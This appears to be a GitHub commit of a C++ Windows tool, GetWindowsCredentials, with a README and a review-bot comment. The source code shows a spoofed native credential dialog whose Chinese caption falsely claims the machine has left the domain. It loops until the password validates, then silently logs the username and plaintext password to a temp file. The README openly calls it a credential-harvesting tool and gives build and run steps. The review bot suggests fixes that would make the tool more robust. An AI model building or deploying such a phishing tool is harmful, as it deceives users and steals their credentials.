
Commit 8f5bebc

author
GitHub
committed
import
0 parents  commit 8f5bebc

7 files changed

Lines changed: 457 additions & 0 deletions


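--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,13 @@
+
+# Visual Studio
+.vs/
+.vscode/
+
+# Build output
+bin/
+obj/
+
+# Temporary files
+*.tmp
+*.log
+*.user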

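--- a/GetWindowsCredentials.sln
+++ b/GetWindowsCredentials.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.31410.357
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GetWindowsCredentials", "GetWindowsCredentials\GetWindowsCredentials.vcxproj", "{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|x64 = Debug|x64
+Debug|x86 = Debug|x86
+Release|x64 = Release|x64
+Release|x86 = Release|x86
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x64.ActiveCfg = Debug|x64
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x64.Build.0 = Debug|x64
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x86.ActiveCfg = Debug|Win32
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x86.Build.0 = Debug|Win32
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x64.ActiveCfg = Release|x64
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x64.Build.0 = Release|x64
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x86.ActiveCfg = Release|Win32
+{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x86.Build.0 = Release|Win32
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {60239394-BA56-4F73-83CE-A8EBB7B2FA42}
+EndGlobalSection
+EndGlobal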

GetWindowsCredentials/GetWindowsCredentials.vcxproj

Lines changed: 153 additions & 0 deletions
Lines changed: 22 additions & 0 deletions
@@ -0,0 +1,22 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup>
4+
<Filter Include="源文件">
5+
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6+
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7+
</Filter>
8+
<Filter Include="头文件">
9+
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10+
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11+
</Filter>
12+
<Filter Include="资源文件">
13+
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14+
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15+
</Filter>
16+
</ItemGroup>
17+
<ItemGroup>
18+
<ClCompile Include="Source.cpp">
19+
<Filter>源文件</Filter>
20+
</ClCompile>
21+
</ItemGroup>
22+
</Project>

GetWindowsCredentials/Source.cpp

Lines changed: 97 additions & 0 deletions
@@ -0,0 +1,97 @@
1+
#include <Windows.h>
2+
#include <wincred.h>
3+
#pragma comment(lib,"Credui.lib")
4+
5+
BOOL WriteCred(LPWSTR saveAs,LPWSTR username, LPWSTR password) {
6+
PWCHAR szBuffer = new WCHAR[CREDUI_MAX_USERNAME_LENGTH + CREDUI_MAX_USERNAME_LENGTH+1];
7+
HANDLE hFile = CreateFile(
8+
saveAs,
9+
GENERIC_ALL,
10+
FILE_SHARE_READ,
11+
NULL,
12+
OPEN_ALWAYS,
13+
FILE_ATTRIBUTE_NORMAL,
14+
NULL
15+
);
16+
wsprintf(szBuffer, L"[+]Username: %s , Password: %s\n", username, password);
17+
if (hFile != INVALID_HANDLE_VALUE) {
18+
WriteFile(hFile, szBuffer, lstrlenW(szBuffer)*sizeof(WCHAR), NULL, NULL);
19+
CloseHandle(hFile);
20+
return TRUE;
21+
}
22+
return FALSE;
23+
}
24+
25+
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
26+
WCHAR username[CREDUI_MAX_USERNAME_LENGTH* sizeof(WCHAR)] = { 0 };
27+
WCHAR password[CREDUI_MAX_PASSWORD_LENGTH* sizeof(WCHAR)] = { 0 };
28+
WCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)] = { 0 };
29+
DWORD dwUsernameSize = CREDUI_MAX_USERNAME_LENGTH+1;
30+
DWORD dwPasswordSize = CREDUI_MAX_PASSWORD_LENGTH+1;
31+
DWORD dwDomainSize = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;
32+
WCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
33+
WCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
34+
// 提示信息
35+
WCHAR baseCaption[] = L"请输入当前用户账号密码:";
36+
WCHAR pszCaptionText[] = L"您的机器已脱域,请重新认证";
37+
// 保存凭据位置
38+
WCHAR saveAs[] = L"C:\\Windows\\Temp\\creds.log";
39+
LPWSTR boxMessage = NULL;
40+
ULONG authPackage = 0;
41+
LPVOID outCredBuffer = NULL;
42+
ULONG outCredSize = 0;
43+
BOOL bsave = FALSE;
44+
BOOL bLoginStatus = FALSE;
45+
CREDUI_INFOW credui = { sizeof(credui) };
46+
credui.cbSize = sizeof(credui);
47+
HANDLE hLogon = NULL;
48+
credui.hwndParent = NULL;
49+
50+
credui.pszMessageText = baseCaption;
51+
credui.pszCaptionText = (PCWSTR)pszCaptionText;
52+
// Always try to Login...
53+
__LOGIN:
54+
DWORD dwRet = CredUIPromptForWindowsCredentialsW(
55+
&credui,
56+
0,
57+
&authPackage,
58+
NULL,
59+
0,
60+
&outCredBuffer,
61+
&outCredSize,
62+
&bsave,
63+
CREDUIWIN_ENUMERATE_CURRENT_USER
64+
);
65+
if (dwRet == ERROR_SUCCESS) {
66+
CredUnPackAuthenticationBufferW(
67+
CRED_PACK_PROTECTED_CREDENTIALS,
68+
outCredBuffer,
69+
outCredSize,
70+
username,
71+
&dwUsernameSize,
72+
domain,
73+
&dwDomainSize,
74+
password,
75+
&dwPasswordSize
76+
);
77+
78+
CredUIParseUserNameW(
79+
username,
80+
parsedUserName,
81+
CREDUI_MAX_USERNAME_LENGTH + 1,
82+
parsedDomain,
83+
CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1
84+
);
85+
bLoginStatus = LogonUserW(parsedUserName, parsedDomain, password, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &hLogon);
86+
if (bLoginStatus) {
87+
WriteCred(saveAs, username, password);
88+
// MessageBox(NULL, username, password, MB_OK);
89+
}
90+
else {
91+
// 如果登录失败,继续登录。
92+
goto __LOGIN;
93+
}
94+
}
95+
96+
return 0;
97+
}
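Review bot: The return values of `CredUnPackAuthenticationBufferW` and `CredUIParseUserNameW` in WinMain are never checked, so when either fails `parsedUserName` and `parsedDomain` (declared without an initializer) reach `LogonUserW` holding uninitialized stack contents; wrap each call as `if (!CredUnPackAuthenticationBufferW(...)) { /* handle failure */ }` and give both arrays `= { 0 }` like the other buffers. The buffer the prompt returns in `outCredBuffer` is documented as caller-owned and is never released, and the token stored in `hLogon` by a successful `LogonUserW` is never closed, so every pass through the `__LOGIN` loop leaks both; `CoTaskMemFree(outCredBuffer);` and `CloseHandle(hLogon);` belong at the end of the `ERROR_SUCCESS` branch. In `WriteCred`, `WriteFile` is passed NULL for both `lpNumberOfBytesWritten` and `lpOverlapped`, which the API contract does not permit for a synchronous write, and the `new WCHAR[]` buffer is never deleted on either return path. The label `__LOGIN` is also a reserved identifier (double leading underscore); a plain `do { ... } while (!bLoginStatus);` would replace the `goto` and the label together.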

README.md

Lines changed: 141 additions & 0 deletions
@@ -0,0 +1,141 @@
1+
# 🔐 GetWindowsCredentials
2+
3+
A Windows credential harvesting tool that leverages the legitimate Windows API to prompt users for their credentials.
4+
5+
[![Platform](https://img.shields.io/badge/platform-Windows-blue.svg)](https://www.microsoft.com/windows)
6+
[![Language](https://img.shields.io/badge/language-C%2B%2B-00599C.svg)](https://isocpp.org/)
7+
[![License](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)
8+
9+
## Overview
10+
11+
GetWindowsCredentials uses the Windows API function [CredUIPromptForWindowsCredentialsW](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforwindowscredentialsw) to display a native Windows credential dialog box. When users enter their credentials, the tool validates them against the system and saves successful login attempts to a file.
12+
13+
![Example](./images/example.png)
14+
15+
## Features
16+
17+
- **Native Windows Dialog** - Uses legitimate Windows credential UI
18+
- **Credential Validation** - Verifies credentials against the domain/local system
19+
- **Persistent Prompting** - Continues to prompt until valid credentials are entered
20+
- **Domain Support** - Handles both domain and local accounts
21+
- **Silent Logging** - Saves credentials to a log file without user notification
22+
23+
## How It Works
24+
25+
1. Displays a Windows credential prompt using `CredUIPromptForWindowsCredentialsW`
26+
2. Captures username, password, and domain information
27+
3. Validates credentials using `LogonUserW` API
28+
4. If validation fails, prompts again until successful
29+
5. Saves valid credentials to `C:\Windows\Temp\creds.log`
30+
31+
## Technical Details
32+
33+
### APIs Used
34+
35+
- `CredUIPromptForWindowsCredentialsW` - Display credential dialog
36+
- `CredUnPackAuthenticationBufferW` - Extract credentials from buffer
37+
- `CredUIParseUserNameW` - Parse username and domain
38+
- `LogonUserW` - Validate credentials against the system
39+
40+
### Output Format
41+
42+
Credentials are saved in the following format:
43+
```
44+
[+]Username: DOMAIN\username , Password: password123
45+
```
46+
47+
## Building
48+
49+
### Prerequisites
50+
51+
- Visual Studio 2015 or later
52+
- Windows SDK
53+
- C++ compiler with Windows API support
54+
55+
### Compilation
56+
57+
**Using Visual Studio:**
58+
1. Open Developer Command Prompt
59+
2. Navigate to the source directory
60+
3. Run the following command:
61+
62+
```cmd
63+
cl /EHsc GetWindowsCredentials.cpp /link Credui.lib
64+
```
65+
66+
**Using MinGW:**
67+
```bash
68+
g++ GetWindowsCredentials.cpp -o GetWindowsCredentials.exe -lCredui -mwindows
69+
```
70+
71+
## Usage
72+
73+
### Basic Execution
74+
75+
```cmd
76+
GetWindowsCredentials.exe
77+
```
78+
79+
The program will:
80+
1. Display a Windows credential dialog
81+
2. Wait for the user to enter credentials
82+
3. Validate the credentials
83+
4. Save successful logins to `C:\Windows\Temp\creds.log`
84+
5. Repeat if validation fails
85+
86+
### Customization
87+
88+
You can modify the following constants in the source code:
89+
90+
```cpp
91+
// Dialog text
92+
WCHAR baseCaption[] = L"Enter current user credentials:";
93+
WCHAR pszCaptionText[] = L"Your screen has been locked for security";
94+
95+
// Output file location
96+
WCHAR saveAs[] = L"C:\\Windows\\Temp\\creds.log";
97+
```
98+
99+
## Code Structure
100+
101+
### Main Components
102+
103+
**WriteCred Function**
104+
- Writes captured credentials to a log file
105+
- Formats output with username and password
106+
107+
**WinMain Function**
108+
- Main entry point
109+
- Displays credential prompt
110+
- Validates credentials
111+
- Loops until valid credentials are provided
112+
113+
### Key Variables
114+
115+
- `username` - Captured username (max 514 characters)
116+
- `password` - Captured password (max 256 characters)
117+
- `domain` - Captured domain (max 337 characters)
118+
- `bLoginStatus` - Validation result flag
119+
120+
### Why Credentials Are Validated
121+
122+
The tool validates credentials using `LogonUserW` to:
123+
- Ensure captured credentials are legitimate
124+
- Avoid logging incorrect passwords
125+
- Simulate real-world attack scenarios
126+
- Demonstrate the full credential harvesting process
127+
128+
### Loop Behavior
129+
130+
The program uses a `goto` statement to create a loop that continues prompting until valid credentials are provided. This simulates a locked screen scenario where the user must authenticate to proceed.
131+
132+
## References
133+
134+
- [CredUIPromptForWindowsCredentialsW API](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforwindowscredentialsw)
135+
- [CredUnPackAuthenticationBufferW API](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credunpackauthenticationbufferw)
136+
- [LogonUserW API](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw)
137+
138+
139+
## License
140+
141+
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

images/example.png

